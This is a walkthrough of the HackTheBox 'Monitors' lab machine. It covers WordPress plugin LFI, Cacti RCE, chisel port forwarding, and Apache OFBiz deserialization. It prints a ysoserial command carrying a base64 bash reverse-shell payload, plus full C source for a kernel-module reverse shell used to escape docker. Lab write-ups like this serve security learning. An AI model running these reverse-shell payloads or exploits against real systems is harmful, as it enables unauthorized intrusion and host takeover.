# HackTheBox - Monitors ![](/files/-M_RhbJ5ML7ebCtrRAhw) This box is one of my favourite one as it contains a lot of CVE related vulnerabilities. CVE means that it is related to Real World vulnerabilities. So let's get started. ### Nmap scan results ```csharp nmap -A -T4 -p- -oA nmap-allport 10.10.10.238 ``` ![](/files/-M_Ri3wD1s24xUsQM8Ey) Its always good to scan all the ports. I will be adding **`monitors.htb`** to /etc/hosts file. ### Enumerating Wordpress ![](/files/-M_RifMgNUL-u1GnuzCW) I will be using **`wpscan`** tool which can help us identify potential vulnerable plugins and probable users. ```csharp wpscan --url http://monitors.htb/ --enumerate u,vp ``` ![](/files/-M_Rj72iYOkVhl1iAnus) The tool didn't gave us any vulnerable plugins, so I will manually try to browse the plugin directory. The directory is located at **`/wp-content/plugins/`** ![](/files/-M_RjNROcx9Is7NSo3y3) ### WP Spritz Plugin (Vulnerable to LFI) ![](/files/-M_RjYkVciisCbG3uNT9) {% embed url="" %} ![](/files/-M_Rk0AKpXupvC4yFpZH) We can **`FUZZ`** the url parameter from this wordlist over [here](https://book.hacktricks.xyz/pentesting-web/file-inclusion/lfi-linux-list) or we can try to manually FUZZ it. First thing to look for is Apache log poisoining followed by old school tricks. That didn't gave us anything. So next thing to look for is **`apache2.conf`** file. Also another thing to look for is wp-config.php which might contain potential usernames and passwords. ![](/files/-M_RlmAbClaXNxW9zEgj) ![](/files/-M_Rl2S4FOWD2A56lqOn) ### Discovering cacti-admin.monitors.htb (Virtual host) There's also virtual hosting present. We can add **`cacti-admin.monitors.htb`** into our /etc/hosts file. ![](/files/-M_RlIAvPSoxI9cvs6bd) ![](/files/-M_Rlv1Vz7fpF0UVbBkT) We have credentials, maybe we can try default usernames like admin, administrator, guest, etc. I tried **`admin : BestAdministrator@2020!`** and got access to it. (Lucky af) ### Exploiting Cacti (SQLi/ Remote Code Execution) The version of cacti used is **1.2.12.** So let's search for any known vulnerabilities on google. ![](/files/-M_RmbNmSYeK2XsXXe5C) Read what the misconfiguration is and download the exploit. We need to provide credentials to exploit this vulnerability. ![](/files/-M_RnR3UqErMUodCr_CR) ### Docker Enumeration (Scanning for hosts) After getting the shell, I got stuck for a very long time. Then I decided to proceed with docker enumeration. (I checked it using ifconfig command) ![](/files/-M_Rnt4m5raGPsntvhBF) So to search for other hosts present on docker interface, I grabbed the static **`nmap`** binary from my machine using netcat. (As curl and wget not installed on the system) ![](/files/-M_RoXEhrcfw1SwjvFIf) Now we can use nmap to scan for ports as well but I like this script which is comparitively fast and easy. ```java #!/bin/bash ip=$1 if [[ $# -eq 0 ]];then echo "[-] Supply IP Address" exit 0 fi for i in `seq 1 65535`;do echo 1 > /dev/tcp/$ip/$i if [[ $? -eq 0 ]];then echo "[+] Port open: $i" fi done ``` ![](/files/-M_Rp0fFtqKaS8m7chTc) ### Forwarding the ports to our local machine using chisel Now I will be forwarding these ports to my local machine using chisel. You can get chisel from [here](https://github.com/jpillora/chisel/releases/tag/v1.7.6). ```java ./chisel server --reverse -p 9002 (My local machine) ./chisel client 10.10.14.44:9002 R:8443:127.0.0.1:8443 & (Remote machine) ./chisel client 10.10.14.44:9002 R:8081:127.0.0.1:8080 & (Remote machine) ``` ![](/files/-M_Rqi7ydZwq65oYZLKP) So apache ofbiz is running on port 8443, we can check that by going to ![](/files/-M_Rr47M0ZCgSFp05E7v) {% hint style="info" %} Apache OFBiz is an open source enterprise resource planning system. It provides a suite of enterprise applications that integrate and automate many of the business processes of an enterprise. OFBiz is an Apache Software Foundation top level project. {% endhint %} ### Exploiting Apache OFBiz XMLRPC Deserialization (RCE) We can look for known vulnerabilities out there on google. The version we are running is **`17.12.01`**. Got using **`ps aux`** (which lists the running processes) ![](/files/-M_RrdBehE4oYfXqGs4X) {% embed url="" %} This one looks satisfying. To exploit this vulnerability, we need to send malicious serialized data to **`/webtools/control/xmlrpc`**. Intercept the request in Burp and change the request method to **POST**. Also change the **Content-Type** header to **`application/xml`** ![](/files/-M_RsS2QhJQy2g8MnIyr) ```markup ProjectDiscovery test [Malicious Serialized Data] ``` Now to generate the serialized data, I will be using **ysoserial.jar.** Download the jar file from [here](https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar). Use this [website ](http://www.jackson-t.ca/runtime-exec-payloads.html)to generate reverse shell payloads for Java deserialization. ![](/files/-M_Rtr9wfywcMs8GhB9u) ```java java -jar ysoserial.jar CommonsBeanutils1 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40NC8xMzM3IDA+JjE=}|{base64,-d}|{bash,-i}' | base64 -w 0 ``` Copy the payload and paste it in Burp. Make sure you are listening on port you specified. ![](/files/-M_RuNIra_GW7TFVTz9H) ![](/files/-M_RuQ63p-os911yAf-D) ### Escaping docker using [SYS\_MODULE ](https://man7.org/linux/man-pages/man7/capabilities.7.html)Capability Now if you will check the capabilities, we have **`cap_sys_module`**.(Check it using **`capsh --print`**) ![](/files/-M_RwBkZqelI5qM11E_I) {% hint style="info" %} The **CAP\_SYS\_MODULE** capability allows loading modules from anywhere, rather than restricting the module search path to /lib/modules/.. {% endhint %} {% embed url="" %} We can exploit this to get root access on host machine. The above article explains it very well. ```java // Reverse shell - I named it to be shell.c #include #include MODULE_LICENSE("GPL"); MODULE_AUTHOR("AttackDefense"); MODULE_DESCRIPTION("LKM reverse shell module"); MODULE_VERSION("1.0"); char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/172.17.0.2/4444 0>&1", NULL}; static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL }; static int __init reverse_shell_init(void) { return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC); } static void __exit reverse_shell_exit(void) { printk(KERN_INFO "Exiting\n"); } module_init(reverse_shell_init); module_exit(reverse_shell_exit); ``` ```java // Makefile obj-m +=shell.o all: make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules clean: make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean ``` ![](/files/-M_Rx3oFo7qF907OkAJk) Now we need to listen on port **4444** before we insert this module. ![](/files/-M_Rxx7PqdscNLJSkeaF) And now insert the module using **insmod** command. ![](/files/-M_Ry8_3_j3aqycUBm-6) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://akshaydeepakshinde.gitbook.io/hackthebox-linux/hackthebox-monitors.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.